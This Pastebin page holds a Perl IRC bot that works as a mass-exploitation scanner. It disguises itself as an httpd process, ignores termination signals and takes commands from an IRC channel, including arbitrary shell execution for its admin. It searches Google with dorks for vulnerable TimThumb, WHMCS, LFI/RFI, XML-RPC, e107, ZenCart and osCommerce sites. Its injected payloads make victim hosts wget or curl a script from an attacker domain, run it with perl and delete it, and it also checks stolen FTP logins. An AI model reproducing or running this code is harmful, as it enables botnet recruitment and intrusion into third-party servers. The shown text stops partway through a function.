Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use HTTP::Request;
- use HTTP::Request::Common;
- use HTTP::Request::Common qw(POST);
- use LWP::Simple;
- use LWP 5.64;
- use LWP::UserAgent;
- use Socket;
- use IO::Socket;
- use IO::Socket::INET;
- use IO::Select;
- use MIME::Base64;
- use URI::Escape;
- use Digest::MD5 qw(md5_hex);
- use DBI;
- use DBD::mysql;
- my $datetime = localtime;
- my $fakeproc = "/usr/sbin/httpd";
- my $ircserver = "scan.no-ip.org";
- my $ircport = 6667;
- my $nickname = "ath0[".int(rand(100))."]";
- my $ident = "Sigit";
- my $channel = "#or";
- my $chanxxx = "#or";
- my $chaninfo = "#or";
- my $submitchan = "#or";
- my $admin = "ath0";
- my $fullname = "[!][scanner] Multi VersioN";
- my $rawmsg = $ARGV[4];
- my $msgraw = $ARGV[5];
- my $nob0dy = " [!][scanner] Multi VersioN ";
- my $whmcslogo = " [!] WHMCS <=> ";
- my $thumblogo = " [!] TimThumb <=> ";
- my $zerologo = " [!] zBoarD <=> ";
- my $lfilogo = " [!] Lfi <=> ";
- my $rfilogo = " [!] Rfi <=> ";
- my $xmllogo = " [!] Xml <=> ";
- my $oscologo = " [!]Osco <=> ";
- my $oscosqllogo = " [!] O-Sql <=> ";
- my $e107logo = " [!] E107 <=> ";
- my $ihlogo = " [!] Is-Human <=> ";
- my $zenlogo = " [!] ZenCart <=> ";
- my $rfglogo = " [!] RfG <=> ";
- my $carilogo = " [!] Find <=> ";
- my $whmcscmd = '.whmcs';
- my $thumbcmd = "!tim".int(rand(10));
- my $zerocmd = ".zero";
- my $lficmd = ".lfi";
- my $rficmd = ".rfi";
- my $xmlcmd = ".xml";
- my $e107cmd = ".e107";
- my $zencmd = ".zenc";
- my $ihcmd = ".ishu";
- my $oscocmd = ".osco";
- my $cmdlfi = ".cmdlfi";
- my $cmdxml = ".cmdxml";
- my $cmde107 = ".cmde107";
- my $rfgcmd = ".rfg";
- my $ftpcmd = ".ftp";
- my $spreadMode = 1;
- my $zerowget = 1;
- my $zerolwp = 1;
- my $zerocurl = 1;
- my $gps = 1;
- my $gps2 = 1;
- my $timot = 10;
- my $silentmode = 1;
- my $hostinjector = "flickr.com.lmao2.com";
- my $thumbid = "http://".$hostinjector."/bad.php";
- my $botdid = "http://".$hostinjector."/load.php";
- my $botxdid = "http://".$hostinjector."/xcrew.php";
- my $thumbshell = uri_escape($thumbid);
- my $md5php = md5_hex($thumbid).".php";
- my $md5bot = md5_hex($botdid).".php";
- my $md5botx = md5_hex($botxdid).".php";
- my $botid = uri_escape($botdid);
- my $botxid = uri_escape($botxdid);
- my $injector = "http://".$hostinjector."/bad.txt";
- my $botshell = "http://".$hostinjector."/bot.txt";
- my $subticket = "/submitticket.php?step=2&deptid=1";
- my $action = "/data/lobex.php";
- my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;wget%20;perl%20botis.txt;rm%20botis.txt";
- my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;lwp-download%20-a%20;perl%20botis.txt;rm%20botis.txt";
- my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;curl%20-C%20-%20-O%20;perl%20botis.txt;rm%20botis.txt";
- my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6";
- my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
- my $jpath = "/wp-includes/error.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
- my $jack1 = "http://tema1.simgta.com/lobex.php?q="; #"http://altadelisboa.com".$jpath;
- my $jack2 = "http://tema1.simgta.com/lobex.php?q="; #"http://selectiveretreats.com".$jpath;
- my $jack3 = "http://tema1.simgta.com/lobex.php?q="; #"http://agri-impact.com".$jpath;
- my $jack4 = "http://tema1.simgta.com/lobex.php?q="; #"http://viewwebinars.com".$jpath;
- my $jack5 = "http://tema1.simgta.com/lobex.php?q="; #"http://liftoffconsulting.ca".$jpath;
- my $engine = "JacKAC,JacKAD,JacKAE,JacKAF,JacKAG,JacKAL,JacKAM,JacKAN,JacKAT,JacKAR,JacKAU,JacKBE,JacKHU,JacKOrG,JacKCoM,JacKNeT,JacKPL,JacKIT,JacKID,JacKMY,
- JacKES,JacKUK,JacKUS,JacKJP,JacKKR,JacKDE,JacKDK,JacKCA,JacKBR,JacKRO,JacKRU,JacKNL,JacKInfO,JacKFR,JacKIN,JacKMX,JacKCZ,JacKCL,JacKUA,
- JacKCN,JacKIR,JacKTH,JacKEU,JacKPH,JackIL,JackIM,JacKSI,JacKBIZ,GooGLe,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,BigLobe,SeZNam";
- $SIG{'INT'} = 'IGNORE';
- $SIG{'HUP'} = 'IGNORE';
- $SIG{'TERM'} = 'IGNORE';
- $SIG{'CHLD'} = 'IGNORE';
- $SIG{'PS'} = 'IGNORE';
- #chdir("/");
- $ircserver = "$ARGV[0]" if $ARGV[0];
- $ircport = "$ARGV[1]" if $ARGV[1];
- $nickname = "$ARGV[2]" if $ARGV[2];
- $channel = '#'."$ARGV[3]" if $ARGV[3];
- $0 = "$fakeproc"."\0" x 16;
- my $pid = fork;
- exit if $pid;
- die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
- our %irc_servers;
- our %DCC;
- my $dcc_sel = new IO::Select->new();
- $sel_client = IO::Select->new();
- sub sendraw {
- if ($#_ == '1') {
- my $socket = $_[0];
- print $socket "$_[1]\n";
- } else {
- print $IRC_cur_socket "$_[0]\n";
- }
- }
- sub connector {
- my $mynick = $_[0];
- my $ircserver_con = $_[1];
- my $ircport_con = $_[2];
- my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
- if (defined($IRC_socket)) {
- $IRC_cur_socket = $IRC_socket;
- $IRC_socket->autoflush(1);
- $sel_client->add($IRC_socket);
- $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
- $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
- nick("$mynick");
- sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
- sleep(1);}}
- sub parse {
- my $servarg = shift;
- if ($servarg =~ /^PING \:(.*)/) {
- sendraw("PONG :$1");
- }
- elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
- if (lc($1) eq lc($mynick)) {
- $mynick = $4;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- }
- }
- elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
- nick($mynick.int(rand(5)));
- }
- elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
- $mynick = $2;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
- sendraw("MODE $mynick +Bx");
- sendraw("NS id qwe123");
- sleep(3);
- sendraw("JOIN $channel correct");
- sendraw("JOIN $chanxxx mejen");
- sleep(1);
- sendraw("PRIVMSG $channel : EhhEemmmm !!!");
- sendraw("PRIVMSG $admin :Hi $admin im here !!!");
- }
- }
- my $line_temp;
- while( 1 ) {
- while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
- select(undef, undef, undef, 0.01);
- delete($irc_servers{''}) if (defined($irc_servers{''}));
- my @ready = $sel_client->can_read(0);
- next unless(@ready);
- foreach $fh (@ready) {
- $IRC_cur_socket = $fh;
- $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
- $nread = sysread($fh, $ircmsg, 4096);
- if ($nread == 0) {
- $sel_client->remove($fh);
- $fh->close;
- delete($irc_servers{$fh});
- }
- @lines = split (/\n/, $ircmsg);
- $ircmsg =~ s/\r\n$//;
- if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
- my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
- if ($path eq $mynick) {
- if ($msg =~ /^ PING (.*) /) {
- sendraw("NOTICE $nick : PING $1 ");
- }
- if ($msg =~ /^ VERSION /) {
- sendraw("NOTICE $nick : VERSION mIRC v6.21 Khaled Mardam-Bey ");
- }
- if ($msg =~ /^ TIME /) {
- sendraw("NOTICE $nick : TIME ".$datetime." ");
- }
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
- sendraw("NICK ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
- }
- if (&isAdmin($nick) && $msg !~ /^!/) {
- &shell("$nick","$msg");
- }
- if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) {
- sendraw("$rawmsg $msgraw ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!say (.+)/) {
- sendraw("PRIVMSG $rawmsg ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!act (.+)/) {
- sendraw("PRIVMSG $rawmsg : ACTION ".$1." ");
- }
- if (&isAdmin($nick) && $msg =~ /^!chtcmd\s+(.*) -d/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- $newthumbcmd = $1;
- $thumbcmd = $newthumbcmd;
- &msg("$admin","$thumblogo Scan Command change to $thumbcmd ");
- }}}
- if (&isAdmin($nick) && $msg =~ /^!chzcmd\s+(.*) -d/) {
- $newzerocmd = $1;
- $zerocmd = $newzerocmd;
- &msg("$admin","$zerologo Scan Command change to $zerocmd ");
- }
- if (&isAdmin($nick) && $msg =~ /^!chwcmd\s+(.*) -d/) {
- $newwhmcscmd = $1;
- $whmcscmd = $newwhmcscmd;
- &msg("$admin","$whmcslogo Scan Command change to $whmcscmd ");
- }
- if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) {
- $newtimot = $1;
- $timot = $newtimot;
- &msg("$admin"," Get Content TimeOut change to $timot ");
- }
- if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- $newchan = $1;
- $chanxxx = $newchan;
- &msg("$admin"," xChan change to $chanxxx ");
- }}}
- }
- else {
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg eq "!part") {
- sendraw("PART $path");
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
- &shell("$path","$1");
- }
- if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
- &shell("$path","$1");
- }
- if ($msg=~ /^!silent\s+(.*) -d/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- $smod = $1;
- if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; }
- elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; }
- &msg("$path"," [!]Silent Mode $silentstat !!!!");
- }}}
- if ($msg=~ /^!jackx\s+(.*) -d/) {
- $engmod = $1;
- if ($engmod =~ /ON/) { $gps = 1; $gpsstat = "ACTIVATED"; }
- elsif ($engmod =~ /OFF/) { $gps = 0; $gpsstat = "DEACTIVATED"; }
- &msg("$path","[!]Jack Engine $gpsstat !!!!");
- }
- if ($msg=~ /^!engine\s+(.*) -d/) {
- $engmod = $1;
- if ($engmod =~ /ON/) { $gps2 = 1; $gpsstat = "ACTIVATED"; }
- elsif ($engmod =~ /OFF/) { $gps2 = 0; $gpsstat = "DEACTIVATED"; }
- &msg("$path","[!]Multi Engine $gpsstat !!!!");
- }
- if (&isAdmin($nick) && $msg =~ /^!injector\s+(.*) -d/) {
- $newhostinjector= $1;
- $hostinjector = $newhostinjector;
- &msg("$path"," [ !]Injector change to $hostinjector ");
- }
- if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
- my $url = $1.$lfdtest;
- my $cmd = $2;
- &cmdlfi($url,$cmd,$path);
- }
- if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
- my $url = $1;
- my $cmd = $2;
- &cmdxml($url,$cmd,$path);
- }
- if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
- my $url = $1;
- my $cmd = $2;
- &cmde107($url,$cmd,$path);
- }
- ##################################################################### HELP COMMAND
- if ($msg=~ /^!help/) {
- my $helplogo = " [!]Help <=> ";sleep(3);
- &msg("$path","$helplogo Timthumb Vuln Scan: $thumbcmd [bug] [dork] ");
- &msg("$path","$helplogo RFG Vuln Scan: $rfgcmd [bug] [dork] ");
- &msg("$path","$helplogo RFI Vuln Scan: $rficmd [bug] [dork] ");
- &msg("$path","$helplogo LFI Vuln Scan: $lficmd [bug] [dork] ");
- &msg("$path","$helplogo XML Vuln Scan: $xmlcmd [bug] [dork] ");
- &msg("$path","$helplogo e107 Vuln Scan: $e107cmd [dork] ");
- &msg("$path","$helplogo WHMCS Vuln Scan: $whmcscmd [dork] ");
- &msg("$path","$helplogo ZeroBoard Vuln Scan: $zerocmd [dork] ");
- &msg("$path","$helplogo osCommerce Vuln Scan: $oscocmd [dork] ");
- &msg("$path","$helplogo ZenCart Vuln Scan: $zencmd [dork] ");
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- &msg("$nick"," 6Fake Process/PID : $fakeproc - $$");
- }
- if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
- if (&isFound($thumbid,"GIF89")) {
- &msg("$path"," [!]Injector <=> Ready!!! ");
- } else {
- &msg("$path"," [!]Injector <=> Lost!!! ");
- }
- }
- if ($msg=~/^!bypass/){
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $bystats1 = "";my $bystats2 = "";my $bystats3 = "";my $bystats4 = "";my $bystats5 = "";
- my $cekby1 = &get_content($jack1."byroe");
- if ($cekby1 =~ /byroe\.net/i){ $bystats1 = " Up!!!"; } else { $bystats1 = " Lost!!!"; }
- my $cekby2 = &get_content($jack2."byroe");
- if ($cekby2 =~ /byroe\.net/i){ $bystats2 = " Up!!!"; } else { $bystats2 = " Lost!!!"; }
- my $cekby3 = &get_content($jack3."byroe");
- if ($cekby3 =~ /byroe\.net/i){ $bystats3 = " Up!!!"; } else { $bystats3 = " Lost!!!"; }
- my $cekby4 = &get_content($jack4."byroe");
- if ($cekby4 =~ /byroe\.net/i){ $bystats4 = " Up!!!"; } else { $bystats4 = " Lost!!!"; }
- my $cekby5 = &get_content($jack5."byroe");
- if ($cekby5 =~ /byroe\.net/i){ $bystats5 = " Up!!!"; } else { $bystats5 = " Lost!!!"; }
- &msg("$path","[!]Bypass <=> JacK1=$bystats1 JacK2=$bystats2 JacK3=$bystats3 JacK4=$bystats4 15JacK5=$bystats5 ")
- }}}
- ##################################################################### SCAN
- if ($msg =~ /!cari\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $find = $1;
- &msg($path,"$carilogo Searching $find ");
- &cari($path,$find);
- } exit; }
- }
- if ($msg =~ /^$oscocmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $dork = $1;
- my $simpan = 'situs.txt';
- if (&isFound($thumbid,"GIF89")) {
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan Oscommerce di $path ");
- &msg("$path","$oscologo Dork <=> $dork ");
- &msg("$path","$oscologo Search Engine <=> Loading ");
- &se_start($path,"apalah",$simpan,$dork,$engine,9);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! "); exit;
- }
- }
- }
- }
- if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- my $simpan = 'situs.txt';
- if (&isFound($thumbid,"GIF89")) {
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan LFI di $path ");
- &msg("$path","$lfilogo Dork <=> $dork ");
- &msg("$path","$lfilogo Bugz <=> $bug ");
- &msg("$path","$lfilogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,3);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! "); exit;
- }
- }
- }
- }
- if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- my $simpan = 'situs.txt';
- if (&isFound($thumbid,"GIF89")) {
- &msg("$chanxxx"," [!] Lapor <=> $nick lagi scan RFI di $path ");
- &msg("$path","$rfilogo Dork <=> $dork ");
- &msg("$path","$rfilogo Bugz <=> $bug ");
- &msg("$path","$rfilogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,5);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! "); exit;
- }
- }
- }
- }
- if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan XML di $path ");
- &msg("$path","$xmllogo Dork <=> $dork ");
- &msg("$path","$xmllogo Bugz <=> $bug ");
- &msg("$path","$xmllogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,6);
- }
- }
- }
- if ($msg =~ /^$thumbcmd\s+(.+?[.php])\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- my $simpan = 'situs.txt';
- if ($bug =~ m/^\//){ &msg("$path","[!]Burro tira a barra \/ do comeco :p "); exit; } else {
- if (&isFound($thumbid,"GIF89")) {
- &msg("$chanxxx","[!]Lapor <=> $nick lagi scan TimTHumb di $path ");
- &msg("$path","$thumblogo Dork <=> $dork ");
- &msg("$path","$thumblogo Bugz <=> $bug ");
- &msg("$path","$thumblogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,1);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! "); exit; }
- }
- }
- }
- }
- if ($msg =~ /^$whmcscmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ("cart.php?a=byroe&templatefile=",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan WHMCS di $path ");
- &msg("$path","$whmcslogo Dork <=> $dork ");
- &msg("$path","$whmcslogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,2);
- }
- }
- }
- if ($msg =~ /^$zerocmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if (&isFound($thumbid,"GIF89")) {
- my ($bug,$dork) = ("zboard.php?id=byroe",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan zboard di $path ");
- &msg("$path","$zerologo Dork <=> $dork ");
- &msg("$path","$zerologo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,4);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! ");
- }
- }
- }
- }
- if ($msg =~ /^$e107cmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if (&isFound($thumbid,"GIF89")) {
- my ($bug,$dork) = ("contact.php",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan E107 di $path ");
- &msg("$path","$e107logo Dork <=> $dork ");
- &msg("$path","$e107logo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,7);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! ");
- }
- }
- }
- }
- if ($msg =~ /^$ihcmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if (&isFound($thumbid,"GIF89")) {
- my ($bug,$dork) = ("wp-content/plugins/is-human/engine.php",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan Is-Human di $path ");
- &msg("$path","$ihlogo Dork <=> $dork ");
- &msg("$path","$ihlogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,8);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! ");
- }
- }
- }
- }
- if ($msg =~ /^$zencmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan ZenCart di $path ");
- &msg("$path","$zenlogo Dork <=> $dork ");
- &msg("$path","$zenlogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,10);
- }
- }
- }
- if ($msg =~ /^$rfgcmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ("apalah",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan RFG di $path ");
- &msg("$path","$rfglogo Dork <=> $dork ");
- &msg("$path","$rfglogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,11);
- }
- }
- }
- if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) {
- my $url = $_[0];
- my $host = $_[1];
- my $user = $_[2];
- my $pass = $_[3];
- if (my $pid = fork) {
- waitpid($pid, 0);
- } else {
- if (fork) { exit; } else {
- my ($host,$user,$pass) = ($1,$2,$3);
- &msg("$path","[!]FTP <=> Checking $host | $user:$pass");
- my $success = 1;
- use Net::FTP;
- my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5);
- $success = 0 if $ftp->login($user,$pass);
- $ftp->quit;
- if ($success == 0) {
- ¬ice("$nick","[FTP] [http://".$host."] [".$user.":".$pass."] Success ");
- } else {
- ¬ice("$nick","[FTP] [http://".$host."] [".$user.":".$pass."] Denied ");
- }
- }
- }
- }
- }
- }
- for(my $c=0; $c<= $#lines; $c++) {
- $line = $lines[$c];
- $line = $line_temp.$line if ($line_temp);
- $line_temp = '';
- $line =~ s/\r$//;
- unless ($c == $#lines) {
- parse("$line");
- } else {
- if ($#lines == 0) {
- parse("$line");
- } elsif ($lines[$c] =~ /\r$/) {
- parse("$line");
- } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
- parse("$line");
- } else {
- $line_temp = $line;
- }
- }
- }
- }
- }
- ##################################################################################
- sub lobex() {
- my $dork = $_[0];
- my @targets;
- for (my $st=0; $st<=1000 ; $st+=100){
- my $engine = "http://www.google.com/search?q=".uri_escape($dork)."&num=100&start=".$st;
- my $browser = &search_engine_query($engine);
- while ($browser =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
- my $target = $1;
- if ($target !~ /google|forum|stackoverflow|php\.net/) {
- my @sort = split(/\.php/,$target);
- push (@targets,$sort[0]);
- }
- }
- }
- return @targets;
- }
- sub cari() {
- my $chan = $_[0];
- my $dork = $_[1];
- my $count = 0;
- my @kotor = &lobex($dork);
- my @target = &clean(@kotor);
- my $num = scalar(@target); &msg($chan,"$carilogo Total [$num] sites");
- if ($num > 0) {
- foreach my $site(@target) {
- $count++;
- if ($count == $num-1) {
- &msg("$chan","$carilogo Finished for $dork ");
- }
- my $test = "http://".$site.".php?src=".$thumbshell;
- if (my $pid = fork) { waitpid($pid, 0); } else {
- if (fork) { exit; } else {
- my $coba = &get_content($test);
- if ($coba =~ /Unable to open image/) {
- &msg($chan,"$carilogo VulN -> http://".$site.".php ");
- }
- } exit;
- }
- }
- }
- }
- sub type() {
- my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
- if ($type == 1){$type=&thumb_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 2){$type=&whmcs_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 3){$type=&lfi_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 4){$type=&zero_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 5){$type=&rfi_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 6){$type=&xml_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 7){$type=&e107_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 8){$type=&ih_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 9){$type=&osco_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 10){$type=&zen_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 11){$type=&rfg_exploit($chan,$bug,$simpan,$dork,$engine);}
- }
- ##################################################################################
- sub se_start() {
- my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
- if ($gps ==1) {
- if ($engine =~ /jackae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAE",$type); } exit; } }
- if ($engine =~ /jackar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAR",$type); } exit; } }
- if ($engine =~ /jackat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAT",$type); } exit; } }
- if ($engine =~ /jackau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAU",$type); } exit; } }
- if ($engine =~ /jackbr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBR",$type); } exit; } }
- if ($engine =~ /jackca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCA",$type); } exit; } }
- if ($engine =~ /jackcl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCL",$type); } exit; } }
- if ($engine =~ /jackcn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCN",$type); } exit; } }
- if ($engine =~ /jackcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCoM",$type); } exit; } }
- if ($engine =~ /jackcz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCZ",$type); } exit; } }
- if ($engine =~ /jackde/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDE",$type); } exit; } }
- if ($engine =~ /jackdk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDK",$type); } exit; } }
- if ($engine =~ /jackes/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKES",$type); } exit; } }
- if ($engine =~ /jackeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKEU",$type); } exit; } }
- if ($engine =~ /jackfr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKFR",$type); } exit; } }
- if ($engine =~ /jackhu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKHU",$type); } exit; } }
- if ($engine =~ /jackid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKID",$type); } exit; } }
- if ($engine =~ /jackil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIL",$type); } exit; } }
- if ($engine =~ /jackin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIN",$type); } exit; } }
